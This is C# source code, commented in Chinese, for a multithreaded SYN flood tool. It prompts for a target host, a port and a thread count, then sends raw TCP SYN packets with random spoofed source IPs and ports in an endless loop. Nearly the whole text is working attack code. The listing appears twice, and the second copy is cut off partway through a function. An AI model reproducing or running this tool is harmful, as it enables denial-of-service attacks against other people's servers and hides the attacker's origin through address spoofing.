1 //在工程属性中设置“允许不安全代码”为true
2
3 using System;
4 using System.Net;
5 using System.Net.Sockets;
6 using System.Threading;
7 //需要的命名空间不用解释了吧
8 namespace syn
9 {
10 public struct ipHeader
11 {
12
13
14
15 public byte ip_verlen; //4位首部长度+4位IP版本号
16 public byte ip_tos; //8位服务类型TOS
17 public ushort ip_totallength; //16位数据包总长度(字节)
18
19
20 public ushort ip_id; //16位标识
21 public ushort ip_offset; //3位标志位
22 public byte ip_ttl; //8位生存时间 TTL
23 public byte ip_protocol; //8位协议(TCP, UDP, ICMP, Etc.)
24 public ushort ip_checksum; //16位IP首部校验和
25 public uint ip_srcaddr; //32位源IP地址
26 public uint ip_destaddr; //32位目的IP地址
27 }
28 public struct psdHeader
29 {
30
31
32 public uint saddr; //源地址
33 public uint daddr; //目的地址
34 public byte mbz;
35 public byte ptcl; //协议类型
36 public ushort tcpl; //TCP长度
37 }
38 public struct tcpHeader
39 {
40
41 public ushort th_sport; //16位源端口
42 public ushort th_dport; //16位目的端口
43 public int th_seq; //32位序列号
44
45
46 public uint th_ack; //32位确认号
47 public byte th_lenres; //4位首部长度/6位保留字
48 public byte th_flag; //6位标志位
49
50 public ushort th_win; //16位窗口大小
51 public ushort th_sum; //16位校验和
52 public ushort th_urp; //16位紧急数据偏移量
53
54
55 }
56 //这3个是ip首部tcp伪首部tcp首部的定义。
57 public class syn
58 {
59 private uint ip;
60 private ushort port;
61 private EndPoint ep;
62 private Random rand;
63 private Socket sock;
64 private ipHeader iph;
65 private psdHeader psh;
66 private tcpHeader tch;
67 public UInt16 checksum(UInt16[] buffer, int size)
68 {
69
70 Int32 cksum = 0;
71 int counter;
72 counter = 0;
73
74 while (size > 0)
75 {
76 UInt16 val = buffer[counter];
77
78 cksum += Convert.ToInt32(buffer[counter]);
79 counter += 1;
80 size -= 1;
81 }
82
83 cksum = (cksum >> 16) + (cksum & 0xffff);
84 cksum += (cksum >> 16);
85 return (UInt16)(~cksum);
86 }
87 //这个使用来计算校验码的我照抄c#实现ping那文章的方法,反正ip协议计算校验码方法都一样
88 public syn(uint _ip, ushort _port, EndPoint _ep, Random _rand)
89 {
90 ip = _ip;
91 port = _port;
92 ep = _ep;
93 rand = _rand;
94 ipHeader iph = new ipHeader();
95 psh = new psdHeader();
96 tch = new tcpHeader();
97 sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
98 sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1);
99 //这2个挺重要,必须这样才可以自己提供ip头
100 }
101 //传参数的多线程需要用到代构造函数的对象。
102 static void Main(string[] args)
103 {
104 Console.WriteLine("1、输入攻击ip或域名");
105 try
106 {
107
108
109
110 IPHostEntry pe = Dns.GetHostByName(Console.ReadLine());
111 uint ip = Convert.ToUInt32(pe.AddressList[0].Address);//这是要攻击的ip并转为网络字节序
112 Console.WriteLine("2、输入攻击端口");
113 ushort port = ushort.Parse(Console.ReadLine());
114
115
116
117 IPEndPoint ep = new IPEndPoint(pe.AddressList[0], port);
118 byte[] bt = BitConverter.GetBytes(port);
119 Array.Reverse(bt);
120 port = BitConverter.ToUInt16(bt, 0);
121 //要攻击的端口也得转为网络字节序,必须是16位0-65535,如果用hosttonetworkorder就转成32位的了,无奈这样
122 Console.WriteLine("3、输入攻击线程,最多50个");
123 int xiancheng = Int32.Parse(Console.ReadLine());
124 if (xiancheng < 1 || xiancheng > 50)
125 {
126
127
128
129 Console.WriteLine("必须在1到50之间");
130 return;
131 }
132 Random rand = new Random();
133 Thread[] t = new Thread[xiancheng];
134 syn[] sy = new syn[xiancheng];
135 for (int i = 0; i < xiancheng; i++)
136 {
137
138
139 sy[i] = new syn(ip, port, ep, rand);
140 t[i] = new Thread(new ThreadStart(sy[i].synFS));
141 t[i].Start();
142 }
143 //一个线程对应一个对象,不知多个线程对应同一个对象行不行,请指点。基础不行啊
144 }
145 catch
146 {
147
148 Console.WriteLine("有错误,请检查是不是连在网上,或者输入是否都正确");
149 return;
150 }
151
152
153 }
154 unsafe public void synFS()
155 {
156 iph.ip_verlen = (byte)(4 << 4 | sizeof(ipHeader) / sizeof(uint));
157 //ipv4,20字节ip头,这个固定就是69
158
159
160 iph.ip_tos = 0;
161 //这个0就行了
162 iph.ip_totallength = 0x2800;
163 //这个是ip头+tcp头总长,40是最小长度,不带tcp option,应该是0028但是还是网络字节序所以倒过来成了2800
164
165
166 iph.ip_id = 0x9B18;
167 //这个我是拦截ie发送。直接添上来了
168 iph.ip_offset = 0x40;
169 //这个也是拦截ie的
170 iph.ip_ttl = 64;
171 //也是拦截ie的,也可以是128什么的。
172 iph.ip_protocol = 6;
173 //6就是tcp协议
174 iph.ip_checksum = UInt16.Parse("0");
175
176
177 //没计算之前都写0
178 iph.ip_destaddr = ip;
179 //ip头的目标地址就是要攻击的地址,上面传过来的。
180 psh.daddr = iph.ip_destaddr;
181 //伪tcp首部用于校验的,上面是目的地址,和ip的那个一样。
182
183
184
185 psh.mbz = 0;
186 //这个据说0就行
187 psh.ptcl = 6;
188 //6是tcp协议
189 psh.tcpl = 0x1400;
190 //tcp首部的大小,20字节,应该是0014,还是字节序原因成了1400
191 tch.th_dport = port;
192 //攻击端口号,上面传过来的
193 tch.th_ack = 0;
194 //第一次发送所以没有服务器返回的序列号,为0
195 tch.th_lenres = (byte)((sizeof(tcpHeader) / 4 << 4 | 0));
196 //tcp长度
197 tch.th_flag = 2;
198 //2就是syn
199 tch.th_win = ushort.Parse("16614");
200 //拦截ie的
201 tch.th_sum = UInt16.Parse("0");
202 //没计算之前都为0
203 tch.th_urp = UInt16.Parse("0");
204 //这个连ip都是0,新的攻击方法有改这个值的
205 while (true)
206
207
208
209 {
210
211
212
213 iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255)).Address);
214
215
216 psh.saddr = iph.ip_srcaddr;
217 ushort duankou = Convert.ToUInt16(rand.Next(1, 65535));
218 byte[] bt = BitConverter.GetBytes(duankou);
219 Array.Reverse(bt);
220 tch.th_sport = BitConverter.ToUInt16(bt, 0);
221 tch.th_seq = IPAddress.HostToNetworkOrder((int)rand.Next(-2147483646, 2147483646));
222 //上面用随机种子随机产生源ip源端口和tcp序列号并转为网络字节序
223
224 iph.ip_checksum = 0;
225
226
227 tch.th_sum = 0;
228 //因为循环中,所以每次必须把这2个已有数的清0才可计算
229 byte[] psh_buf = new byte[sizeof(psdHeader)];
230 Int32 index = 0;
231
232
233
234 index = pshto(psh, psh_buf, sizeof(psdHeader));
235 if (index == -1)
236 {
237
238
239
240 Console.WriteLine("构造tcp伪首部错误");
241 return;
242 }
243 index = 0;
244 byte[] tch_buf = new byte[sizeof(tcpHeader)];
245
246
247 index = tchto(tch, tch_buf, sizeof(tcpHeader));
248 if (index == -1)
249 {
250
251
252 Console.WriteLine("构造tcp首部错误1");
253 return;
254 }
255 index = 0;
256 byte[] tcphe = new byte[sizeof(psdHeader) + sizeof(tcpHeader)];
257
258 Array.Copy(psh_buf, 0, tcphe, index, psh_buf.Length);
259 index += psh_buf.Length;
260 Array.Copy(tch_buf, 0, tcphe, index, tch_buf.Length);
261 index += tch_buf.Length;
262 tch.th_sum = chec(tcphe, index);
263 index = 0;
264
265
266
267 index = tchto(tch, tch_buf, sizeof(tcpHeader));
268 if (index == -1)
269 {
270
271
272
273 Console.WriteLine("构造tcp首部错误2");
274 return;
275 }
276 index = 0;
277 byte[] ip_buf = new byte[sizeof(ipHeader)];
278
279
280
281 index = ipto(iph, ip_buf, sizeof(ipHeader));
282 if (index == -1)
283 {
284
285
286
287 Console.WriteLine("构造ip首部错误1");
288 return;
289 }
290 index = 0;
291 byte[] iptcp = new byte[sizeof(ipHeader) + sizeof(tcpHeader)];
292
293
294 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
295 index += ip_buf.Length;
296 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
297 index += tch_buf.Length;
298 iph.ip_checksum = chec(iptcp, index);
299 index = 0;
300
301
302
303 index = ipto(iph, ip_buf, sizeof(tcpHeader));
304 if (index == -1)
305 {
306
307
308 Console.WriteLine("构造ip首部错误2");
309 return;
310 }
311 index = 0;
312 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
313 index += ip_buf.Length;
314
315
316 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
317 index += tch_buf.Length;
318 if (iptcp.Length != (sizeof(ipHeader) + sizeof(tcpHeader)))
319 {
320
321
322
323 Console.WriteLine("构造iptcp报文错误");
324 return;
325 }
326 //上面这一大堆东西就是计算校验和的方法了,方法是
327 //1、建立一个字节数组,前面放tcp伪首部后面放tcp首部,然后计算,确定最终tcp部分的校验和
328 //2、把确定了校验和地tcp首部重新生成字节数组,这是就不加tcp伪首部了,所以工20字节
329 //3、建40字节字节数组,前面放ip首部,后面放tcp首部,校验,确定最终ip部分校验和
330 //4、最后把确定了ip校验和的ip部分和tcp部分先后放入40字节的字节数组中,就是要发送的buffer[]了,就是这么麻烦
331 try
332 {
333
334 sock.SendTo(iptcp, ep);
335 //构造发送字节数组总是麻烦,发送就简单了,socket.sendto就可以了
336
337 }
338 catch
339 {
340 Console.WriteLine("发送错误");
341 return;
342 }
343
344
345 }
346
347 }
348 public UInt16 chec(byte[] buffer, int size)
349 {
350
351
352
353 Double double_length = Convert.ToDouble(size);
354 Double dtemp = Math.Ceiling(double_length / 2);
355 int cksum_buffer_length = Convert.ToInt32(dtemp);
356 UInt16[] cksum_buffer = new UInt16[cksum_buffer_length];
357 int icmp_header_buffer_index = 0;
358 for (int i = 0; i < cksum_buffer_length; i++)
359 {
360 cksum_buffer[i] =
361 BitConverter.ToUInt16(buffer, icmp_header_buffer_index);
362 icmp_header_buffer_index += 2;
363 }
364 UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length);
365 return u_cksum;
366 }
367
368
369 //这个是计算校验,把那些类型不一样的全转为16位字节数组用的
370 public Int32 ipto(ipHeader iph, byte[] Buffer, int size)
371 {
372 Int32 rtn = 0;
373 int index = 0;
374 byte[] b_verlen = new byte[1];
375 b_verlen[0] = iph.ip_verlen;
376 byte[] b_tos = new byte[1];
377 b_tos[0] = iph.ip_tos;
378 byte[] b_totallen = BitConverter.GetBytes(iph.ip_totallength);
379 byte[] b_id = BitConverter.GetBytes(iph.ip_id);
380
381 byte[] b_offset = BitConverter.GetBytes(iph.ip_offset);
382 byte[] b_ttl = new byte[1];
383 b_ttl[0] = iph.ip_ttl;
384 byte[] b_protol = new byte[1];
385 b_protol[0] = iph.ip_protocol;
386 byte[] b_checksum = BitConverter.GetBytes(iph.ip_checksum);
387 byte[] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr);
388 byte[] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr);
389 Array.Copy(b_verlen, 0, Buffer, index, b_verlen.Length);
390 index += b_verlen.Length;
391 Array.Copy(b_tos, 0, Buffer, index, b_tos.Length);
392 index += b_tos.Length;
393 Array.Copy(b_totallen, 0, Buffer, index, b_totallen.Length);
394 index += b_totallen.Length;
395
396 Array.Copy(b_id, 0, Buffer, index, b_id.Length);
397 index += b_id.Length;
398 Array.Copy(b_offset, 0, Buffer, index, b_offset.Length);
399 index += b_offset.Length;
400 Array.Copy(b_ttl, 0, Buffer, index, b_ttl.Length);
401 index += b_ttl.Length;
402
403
404
405 Array.Copy(b_protol, 0, Buffer, index, b_protol.Length);
406 index += b_protol.Length;
407 Array.Copy(b_checksum, 0, Buffer, index, b_checksum.Length);
408 index += b_checksum.Length;
409 Array.Copy(b_srcaddr, 0, Buffer, index, b_srcaddr.Length);
410 index += b_srcaddr.Length;
411
412
413
414 Array.Copy(b_destaddr, 0, Buffer, index, b_destaddr.Length);
415 index += b_destaddr.Length;
416 if (index != size/**//* sizeof(IcmpPacket) */)
417 {
418 rtn = -1;
419 return rtn;
420 }
421
422 rtn = index;
423 return rtn;
424
425 }
426
427
428
429 //这个是把ip部分转为字节数组用的
430 public Int32 pshto(psdHeader psh, byte[] buffer, int size)
431 {
432 Int32 rtn;
433 int index = 0;
434 byte[] b_psh_saddr = BitConverter.GetBytes(psh.saddr);
435 byte[] b_psh_daddr = BitConverter.GetBytes(psh.daddr);
436 byte[] b_psh_mbz = new byte[1];
437
438
439 b_psh_mbz[0] = psh.mbz;
440 byte[] b_psh_ptcl = new byte[1];
441 b_psh_ptcl[0] = psh.ptcl;
442 byte[] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl);
443 Array.Copy(b_psh_saddr, 0, buffer, index, b_psh_saddr.Length);
444 index += b_psh_saddr.Length;
445 Array.Copy(b_psh_daddr, 0, buffer, index, b_psh_daddr.Length);
446 index += b_psh_daddr.Length;
447 Array.Copy(b_psh_mbz, 0, buffer, index, b_psh_mbz.Length);
448 index += b_psh_mbz.Length;
449
450
451
452 Array.Copy(b_psh_ptcl, 0, buffer, index, b_psh_ptcl.Length);
453 index += b_psh_ptcl.Length;
454 Array.Copy(b_psh_tcpl, 0, buffer, index, b_psh_tcpl.Length);
455 index += b_psh_tcpl.Length;
456 if (index != size)
457 {
458 rtn = -1;
459 return rtn;
460 }
461 else
462 {
463
464
465 rtn = index;
466 return rtn;
467 }
468
469 }
470 //这个是把tcp伪首部转为字节数组用的
471 public Int32 tchto(tcpHeader tch, byte[] buffer, int size)
472 {
473 Int32 rtn;
474 int index = 0;
475 byte[] b_tch_sport = BitConverter.GetBytes(tch.th_sport);
476 byte[] b_tch_dport = BitConverter.GetBytes(tch.th_dport);
477 byte[] b_tch_seq = BitConverter.GetBytes(tch.th_seq);
478 byte[] b_tch_ack = BitConverter.GetBytes(tch.th_ack);
479 byte[] b_tch_lenres = new byte[1];
480 b_tch_lenres[0] = tch.th_lenres;
481 byte[] b_tch_flag = new byte[1];
482 b_tch_flag[0] = tch.th_flag;
483 byte[] b_tch_win = BitConverter.GetBytes(tch.th_win);
484 byte[] b_tch_sum = BitConverter.GetBytes(tch.th_sum);
485 byte[] b_tch_urp = BitConverter.GetBytes(tch.th_urp);
486
487
488 Array.Copy(b_tch_sport, 0, buffer, index, b_tch_sport.Length);
489 index += b_tch_sport.Length;
490 Array.Copy(b_tch_dport, 0, buffer, index, b_tch_dport.Length);
491 index += b_tch_dport.Length;
492 Array.Copy(b_tch_seq, 0, buffer, index, b_tch_seq.Length);
493 index += b_tch_seq.Length;
494
495
496
497 Array.Copy(b_tch_ack, 0, buffer, index, b_tch_ack.Length);
498 index += b_tch_ack.Length;
499 Array.Copy(b_tch_lenres, 0, buffer, index, b_tch_lenres.Length);
500 index += b_tch_lenres.Length;
501 Array.Copy(b_tch_flag, 0, buffer, index, b_tch_flag.Length);
502 index += b_tch_flag.Length;
503
504 Array.Copy(b_tch_win, 0, buffer, index, b_tch_win.Length);
505 index += b_tch_win.Length;
506 Array.Copy(b_tch_sum, 0, buffer, index, b_tch_sum.Length);
507 index += b_tch_sum.Length;
508 Array.Copy(b_tch_urp, 0, buffer, index, b_tch_urp.Length);
509 index += b_tch_urp.Length;
510 if (index != size)
511 {
512
513
514 rtn = -1;
515 return rtn;
516 }
517 else
518 {
519
520 rtn = index;
521 return rtn;
522 }
523 }
524 //这个是把tcp部分转为字节数组用的,因为这个要用到2次就不把这个和伪首部放一块了。
525 }
526 }
527
528
529 //最后,本代码校验部分的方法参考了用c#实现ping程序的文章
530
2
3 using System;
4 using System.Net;
5 using System.Net.Sockets;
6 using System.Threading;
7 //需要的命名空间不用解释了吧
8 namespace syn
9 {
10 public struct ipHeader
11 {
12
13
14
15 public byte ip_verlen; //4位首部长度+4位IP版本号
16 public byte ip_tos; //8位服务类型TOS
17 public ushort ip_totallength; //16位数据包总长度(字节)
18
19
20 public ushort ip_id; //16位标识
21 public ushort ip_offset; //3位标志位
22 public byte ip_ttl; //8位生存时间 TTL
23 public byte ip_protocol; //8位协议(TCP, UDP, ICMP, Etc.)
24 public ushort ip_checksum; //16位IP首部校验和
25 public uint ip_srcaddr; //32位源IP地址
26 public uint ip_destaddr; //32位目的IP地址
27 }
28 public struct psdHeader
29 {
30
31
32 public uint saddr; //源地址
33 public uint daddr; //目的地址
34 public byte mbz;
35 public byte ptcl; //协议类型
36 public ushort tcpl; //TCP长度
37 }
38 public struct tcpHeader
39 {
40
41 public ushort th_sport; //16位源端口
42 public ushort th_dport; //16位目的端口
43 public int th_seq; //32位序列号
44
45
46 public uint th_ack; //32位确认号
47 public byte th_lenres; //4位首部长度/6位保留字
48 public byte th_flag; //6位标志位
49
50 public ushort th_win; //16位窗口大小
51 public ushort th_sum; //16位校验和
52 public ushort th_urp; //16位紧急数据偏移量
53
54
55 }
56 //这3个是ip首部tcp伪首部tcp首部的定义。
57 public class syn
58 {
59 private uint ip;
60 private ushort port;
61 private EndPoint ep;
62 private Random rand;
63 private Socket sock;
64 private ipHeader iph;
65 private psdHeader psh;
66 private tcpHeader tch;
67 public UInt16 checksum(UInt16[] buffer, int size)
68 {
69
70 Int32 cksum = 0;
71 int counter;
72 counter = 0;
73
74 while (size > 0)
75 {
76 UInt16 val = buffer[counter];
77
78 cksum += Convert.ToInt32(buffer[counter]);
79 counter += 1;
80 size -= 1;
81 }
82
83 cksum = (cksum >> 16) + (cksum & 0xffff);
84 cksum += (cksum >> 16);
85 return (UInt16)(~cksum);
86 }
87 //这个使用来计算校验码的我照抄c#实现ping那文章的方法,反正ip协议计算校验码方法都一样
88 public syn(uint _ip, ushort _port, EndPoint _ep, Random _rand)
89 {
90 ip = _ip;
91 port = _port;
92 ep = _ep;
93 rand = _rand;
94 ipHeader iph = new ipHeader();
95 psh = new psdHeader();
96 tch = new tcpHeader();
97 sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
98 sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1);
99 //这2个挺重要,必须这样才可以自己提供ip头
100 }
101 //传参数的多线程需要用到代构造函数的对象。
102 static void Main(string[] args)
103 {
104 Console.WriteLine("1、输入攻击ip或域名");
105 try
106 {
107
108
109
110 IPHostEntry pe = Dns.GetHostByName(Console.ReadLine());
111 uint ip = Convert.ToUInt32(pe.AddressList[0].Address);//这是要攻击的ip并转为网络字节序
112 Console.WriteLine("2、输入攻击端口");
113 ushort port = ushort.Parse(Console.ReadLine());
114
115
116
117 IPEndPoint ep = new IPEndPoint(pe.AddressList[0], port);
118 byte[] bt = BitConverter.GetBytes(port);
119 Array.Reverse(bt);
120 port = BitConverter.ToUInt16(bt, 0);
121 //要攻击的端口也得转为网络字节序,必须是16位0-65535,如果用hosttonetworkorder就转成32位的了,无奈这样
122 Console.WriteLine("3、输入攻击线程,最多50个");
123 int xiancheng = Int32.Parse(Console.ReadLine());
124 if (xiancheng < 1 || xiancheng > 50)
125 {
126
127
128
129 Console.WriteLine("必须在1到50之间");
130 return;
131 }
132 Random rand = new Random();
133 Thread[] t = new Thread[xiancheng];
134 syn[] sy = new syn[xiancheng];
135 for (int i = 0; i < xiancheng; i++)
136 {
137
138
139 sy[i] = new syn(ip, port, ep, rand);
140 t[i] = new Thread(new ThreadStart(sy[i].synFS));
141 t[i].Start();
142 }
143 //一个线程对应一个对象,不知多个线程对应同一个对象行不行,请指点。基础不行啊
144 }
145 catch
146 {
147
148 Console.WriteLine("有错误,请检查是不是连在网上,或者输入是否都正确");
149 return;
150 }
151
152
153 }
154 unsafe public void synFS()
155 {
156 iph.ip_verlen = (byte)(4 << 4 | sizeof(ipHeader) / sizeof(uint));
157 //ipv4,20字节ip头,这个固定就是69
158
159
160 iph.ip_tos = 0;
161 //这个0就行了
162 iph.ip_totallength = 0x2800;
163 //这个是ip头+tcp头总长,40是最小长度,不带tcp option,应该是0028但是还是网络字节序所以倒过来成了2800
164
165
166 iph.ip_id = 0x9B18;
167 //这个我是拦截ie发送。直接添上来了
168 iph.ip_offset = 0x40;
169 //这个也是拦截ie的
170 iph.ip_ttl = 64;
171 //也是拦截ie的,也可以是128什么的。
172 iph.ip_protocol = 6;
173 //6就是tcp协议
174 iph.ip_checksum = UInt16.Parse("0");
175
176
177 //没计算之前都写0
178 iph.ip_destaddr = ip;
179 //ip头的目标地址就是要攻击的地址,上面传过来的。
180 psh.daddr = iph.ip_destaddr;
181 //伪tcp首部用于校验的,上面是目的地址,和ip的那个一样。
182
183
184
185 psh.mbz = 0;
186 //这个据说0就行
187 psh.ptcl = 6;
188 //6是tcp协议
189 psh.tcpl = 0x1400;
190 //tcp首部的大小,20字节,应该是0014,还是字节序原因成了1400
191 tch.th_dport = port;
192 //攻击端口号,上面传过来的
193 tch.th_ack = 0;
194 //第一次发送所以没有服务器返回的序列号,为0
195 tch.th_lenres = (byte)((sizeof(tcpHeader) / 4 << 4 | 0));
196 //tcp长度
197 tch.th_flag = 2;
198 //2就是syn
199 tch.th_win = ushort.Parse("16614");
200 //拦截ie的
201 tch.th_sum = UInt16.Parse("0");
202 //没计算之前都为0
203 tch.th_urp = UInt16.Parse("0");
204 //这个连ip都是0,新的攻击方法有改这个值的
205 while (true)
206
207
208
209 {
210
211
212
213 iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255)).Address);
214
215
216 psh.saddr = iph.ip_srcaddr;
217 ushort duankou = Convert.ToUInt16(rand.Next(1, 65535));
218 byte[] bt = BitConverter.GetBytes(duankou);
219 Array.Reverse(bt);
220 tch.th_sport = BitConverter.ToUInt16(bt, 0);
221 tch.th_seq = IPAddress.HostToNetworkOrder((int)rand.Next(-2147483646, 2147483646));
222 //上面用随机种子随机产生源ip源端口和tcp序列号并转为网络字节序
223
224 iph.ip_checksum = 0;
225
226
227 tch.th_sum = 0;
228 //因为循环中,所以每次必须把这2个已有数的清0才可计算
229 byte[] psh_buf = new byte[sizeof(psdHeader)];
230 Int32 index = 0;
231
232
233
234 index = pshto(psh, psh_buf, sizeof(psdHeader));
235 if (index == -1)
236 {
237
238
239
240 Console.WriteLine("构造tcp伪首部错误");
241 return;
242 }
243 index = 0;
244 byte[] tch_buf = new byte[sizeof(tcpHeader)];
245
246
247 index = tchto(tch, tch_buf, sizeof(tcpHeader));
248 if (index == -1)
249 {
250
251
252 Console.WriteLine("构造tcp首部错误1");
253 return;
254 }
255 index = 0;
256 byte[] tcphe = new byte[sizeof(psdHeader) + sizeof(tcpHeader)];
257
258 Array.Copy(psh_buf, 0, tcphe, index, psh_buf.Length);
259 index += psh_buf.Length;
260 Array.Copy(tch_buf, 0, tcphe, index, tch_buf.Length);
261 index += tch_buf.Length;
262 tch.th_sum = chec(tcphe, index);
263 index = 0;
264
265
266
267 index = tchto(tch, tch_buf, sizeof(tcpHeader));
268 if (index == -1)
269 {
270
271
272
273 Console.WriteLine("构造tcp首部错误2");
274 return;
275 }
276 index = 0;
277 byte[] ip_buf = new byte[sizeof(ipHeader)];
278
279
280
281 index = ipto(iph, ip_buf, sizeof(ipHeader));
282 if (index == -1)
283 {
284
285
286
287 Console.WriteLine("构造ip首部错误1");
288 return;
289 }
290 index = 0;
291 byte[] iptcp = new byte[sizeof(ipHeader) + sizeof(tcpHeader)];
292
293
294 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
295 index += ip_buf.Length;
296 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
297 index += tch_buf.Length;
298 iph.ip_checksum = chec(iptcp, index);
299 index = 0;
300
301
302
303 index = ipto(iph, ip_buf, sizeof(tcpHeader));
304 if (index == -1)
305 {
306
307
308 Console.WriteLine("构造ip首部错误2");
309 return;
310 }
311 index = 0;
312 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
313 index += ip_buf.Length;
314
315
316 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
317 index += tch_buf.Length;
318 if (iptcp.Length != (sizeof(ipHeader) + sizeof(tcpHeader)))
319 {
320
321
322
323 Console.WriteLine("构造iptcp报文错误");
324 return;
325 }
326 //上面这一大堆东西就是计算校验和的方法了,方法是
327 //1、建立一个字节数组,前面放tcp伪首部后面放tcp首部,然后计算,确定最终tcp部分的校验和
328 //2、把确定了校验和地tcp首部重新生成字节数组,这是就不加tcp伪首部了,所以工20字节
329 //3、建40字节字节数组,前面放ip首部,后面放tcp首部,校验,确定最终ip部分校验和
330 //4、最后把确定了ip校验和的ip部分和tcp部分先后放入40字节的字节数组中,就是要发送的buffer[]了,就是这么麻烦
331 try
332 {
333
334 sock.SendTo(iptcp, ep);
335 //构造发送字节数组总是麻烦,发送就简单了,socket.sendto就可以了
336
337 }
338 catch
339 {
340 Console.WriteLine("发送错误");
341 return;
342 }
343
344
345 }
346
347 }
348 public UInt16 chec(byte[] buffer, int size)
349 {
350
351
352
353 Double double_length = Convert.ToDouble(size);
354 Double dtemp = Math.Ceiling(double_length / 2);
355 int cksum_buffer_length = Convert.ToInt32(dtemp);
356 UInt16[] cksum_buffer = new UInt16[cksum_buffer_length];
357 int icmp_header_buffer_index = 0;
358 for (int i = 0; i < cksum_buffer_length; i++)
359 {
360 cksum_buffer[i] =
361 BitConverter.ToUInt16(buffer, icmp_header_buffer_index);
362 icmp_header_buffer_index += 2;
363 }
364 UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length);
365 return u_cksum;
366 }
367
368
369 //这个是计算校验,把那些类型不一样的全转为16位字节数组用的
370 public Int32 ipto(ipHeader iph, byte[] Buffer, int size)
371 {
372 Int32 rtn = 0;
373 int index = 0;
374 byte[] b_verlen = new byte[1];
375 b_verlen[0] = iph.ip_verlen;
376 byte[] b_tos = new byte[1];
377 b_tos[0] = iph.ip_tos;
378 byte[] b_totallen = BitConverter.GetBytes(iph.ip_totallength);
379 byte[] b_id = BitConverter.GetBytes(iph.ip_id);
380
381 byte[] b_offset = BitConverter.GetBytes(iph.ip_offset);
382 byte[] b_ttl = new byte[1];
383 b_ttl[0] = iph.ip_ttl;
384 byte[] b_protol = new byte[1];
385 b_protol[0] = iph.ip_protocol;
386 byte[] b_checksum = BitConverter.GetBytes(iph.ip_checksum);
387 byte[] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr);
388 byte[] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr);
389 Array.Copy(b_verlen, 0, Buffer, index, b_verlen.Length);
390 index += b_verlen.Length;
391 Array.Copy(b_tos, 0, Buffer, index, b_tos.Length);
392 index += b_tos.Length;
393 Array.Copy(b_totallen, 0, Buffer, index, b_totallen.Length);
394 index += b_totallen.Length;
395
396 Array.Copy(b_id, 0, Buffer, index, b_id.Length);
397 index += b_id.Length;
398 Array.Copy(b_offset, 0, Buffer, index, b_offset.Length);
399 index += b_offset.Length;
400 Array.Copy(b_ttl, 0, Buffer, index, b_ttl.Length);
401 index += b_ttl.Length;
402
403
404
405 Array.Copy(b_protol, 0, Buffer, index, b_protol.Length);
406 index += b_protol.Length;
407 Array.Copy(b_checksum, 0, Buffer, index, b_checksum.Length);
408 index += b_checksum.Length;
409 Array.Copy(b_srcaddr, 0, Buffer, index, b_srcaddr.Length);
410 index += b_srcaddr.Length;
411
412
413
414 Array.Copy(b_destaddr, 0, Buffer, index, b_destaddr.Length);
415 index += b_destaddr.Length;
416 if (index != size/**//* sizeof(IcmpPacket) */)
417 {
418 rtn = -1;
419 return rtn;
420 }
421
422 rtn = index;
423 return rtn;
424
425 }
426
427
428
429 //这个是把ip部分转为字节数组用的
430 public Int32 pshto(psdHeader psh, byte[] buffer, int size)
431 {
432 Int32 rtn;
433 int index = 0;
434 byte[] b_psh_saddr = BitConverter.GetBytes(psh.saddr);
435 byte[] b_psh_daddr = BitConverter.GetBytes(psh.daddr);
436 byte[] b_psh_mbz = new byte[1];
437
438
439 b_psh_mbz[0] = psh.mbz;
440 byte[] b_psh_ptcl = new byte[1];
441 b_psh_ptcl[0] = psh.ptcl;
442 byte[] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl);
443 Array.Copy(b_psh_saddr, 0, buffer, index, b_psh_saddr.Length);
444 index += b_psh_saddr.Length;
445 Array.Copy(b_psh_daddr, 0, buffer, index, b_psh_daddr.Length);
446 index += b_psh_daddr.Length;
447 Array.Copy(b_psh_mbz, 0, buffer, index, b_psh_mbz.Length);
448 index += b_psh_mbz.Length;
449
450
451
452 Array.Copy(b_psh_ptcl, 0, buffer, index, b_psh_ptcl.Length);
453 index += b_psh_ptcl.Length;
454 Array.Copy(b_psh_tcpl, 0, buffer, index, b_psh_tcpl.Length);
455 index += b_psh_tcpl.Length;
456 if (index != size)
457 {
458 rtn = -1;
459 return rtn;
460 }
461 else
462 {
463
464
465 rtn = index;
466 return rtn;
467 }
468
469 }
470 //这个是把tcp伪首部转为字节数组用的
471 public Int32 tchto(tcpHeader tch, byte[] buffer, int size)
472 {
473 Int32 rtn;
474 int index = 0;
475 byte[] b_tch_sport = BitConverter.GetBytes(tch.th_sport);
476 byte[] b_tch_dport = BitConverter.GetBytes(tch.th_dport);
477 byte[] b_tch_seq = BitConverter.GetBytes(tch.th_seq);
478 byte[] b_tch_ack = BitConverter.GetBytes(tch.th_ack);
479 byte[] b_tch_lenres = new byte[1];
480 b_tch_lenres[0] = tch.th_lenres;
481 byte[] b_tch_flag = new byte[1];
482 b_tch_flag[0] = tch.th_flag;
483 byte[] b_tch_win = BitConverter.GetBytes(tch.th_win);
484 byte[] b_tch_sum = BitConverter.GetBytes(tch.th_sum);
485 byte[] b_tch_urp = BitConverter.GetBytes(tch.th_urp);
486
487
488 Array.Copy(b_tch_sport, 0, buffer, index, b_tch_sport.Length);
489 index += b_tch_sport.Length;
